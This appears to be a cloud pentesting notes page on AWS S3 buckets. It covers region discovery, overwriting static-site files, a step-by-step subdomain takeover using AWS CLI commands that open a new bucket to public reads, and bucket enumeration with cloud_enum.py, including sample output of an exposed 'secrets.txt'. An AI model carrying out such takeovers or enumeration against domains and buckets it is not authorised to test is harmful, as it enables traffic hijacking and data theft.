Links

S3 Buckets

S3 overview and attacks

What is an S3 Bucket?

An AWS S3 bucket is a simple yet powerful object storage service that allows you to store and retrieve any amount of data from anywhere on the web. It is designed to offer unlimited scalability, high availability, and durability, making it an ideal solution for businesses of any size. With AWS S3 bucket, you can store and access your data securely, and easily manage permissions to control who has access to your data. It is a cost-effective storage solution that offers a pay-as-you-go pricing model, making it an affordable option for businesses of any size.

URL Format

S3 buckets have to be globally unique because they have a URL e.g.,
  • https://[bucketName].s3.amazonaws.com
  • https://s3-[region].amazonaws.com/[OrgName]

Identify Region

S3 buckets reside and store data in a particular region. We can discover the region in a few ways.
  • nslookup https://tyler123kjdf.s3.amazonaws.com
  • curl -I [bucketName].s3.amazonaws.com

Code Injection

If an S3 bucket hosting a static website permits the mv command, someone could maliciously replace the webpage with another

Subdomain Takeover

S3 buckets can host static websites and leverage a domain name by having an associated CNAME record configured. If the bucket is deleted but the CNAME still exists, an attacker can create a new bucket and website, effectively routing any traffic to the new website.
This attack can be discovered while navigating to a domain and receiving a 404 error along with the code NoSuchBucket.
A deleted S3 bucket still tied to a domain returns a 404 error and name of the bucket
Here are the steps to achieve a subdomain takeover.
  1. 1.
    aws s3api create-bucket --bucket <bucketName> --region <region>
  2. 2.
    aws s3 website s3://<bucketName> --index-document index.html --error-document error.html
  3. 3.
    aws s3 cp index.html s3://<bucketName>
  4. 4.
    aws s3api get-public-access-block --bucket <bucketName>
  5. 5.
    aws s3api put-public-access-block --bucket <bucketName> --public-access-block-configuration "BlockPublicAcls=false,IgnorePublicAcls=false,BlockPublicPolicy=false,RestrictPublicBuckets=false"
  6. 6.
    aws s3api put-bucket-policy --bucket <bucketName> --policy "{"Version":"2012-10-17","Statement":[{"Sid":"PublicReadGetObject","Effect":"Allow","Principal":"","Action":"s3:GetObject","Resource":"arn:aws:s3:::<bucketName>/"}]}"

Enumerating S3 Buckets

Since all S3 buckets have a unique URL, they can be automatically found.
One useful script for this is called cloud_enum.py repo here.

How it Works

  • Pass the script a keyword i.e., this is part of the bucket name e.g., tyler
  • The keyword is mutated e.g., tyler234
  • A DNS lookup is done, this is possible because all AWS S3 buckets have a URL
  • If the DNS lookup is found, the script tries to list the bucket contents s3:ListBucket
  • Of course, anyone can create a bucket named Facebook so it doesn't mean Facebook owns it
# python3 ./cloud_enum.py -k tylerexposedbucket234 --disable-gcp --disable-azure
[+] Checking for S3 buckets
OPEN S3 BUCKET: http://tylerexposedbucket234.s3.amazonaws.com/
FILES:
->http://tylerexposedbucket234.s3.amazonaws.com/tylerexposedbucket234
->http://tylerexposedbucket234.s3.amazonaws.com/dogs.txt
->http://tylerexposedbucket234.s3.amazonaws.com/secrets.txt
Protected S3 Bucket: http://tyler.s3.amazonaws.com/
Protected S3 Bucket: http://tyler1.s3.amazonaws.com/
Protected S3 Bucket: http://tyler-1.s3.amazonaws.com/
Protected S3 Bucket: http://tyler2.s3.amazonaws.com/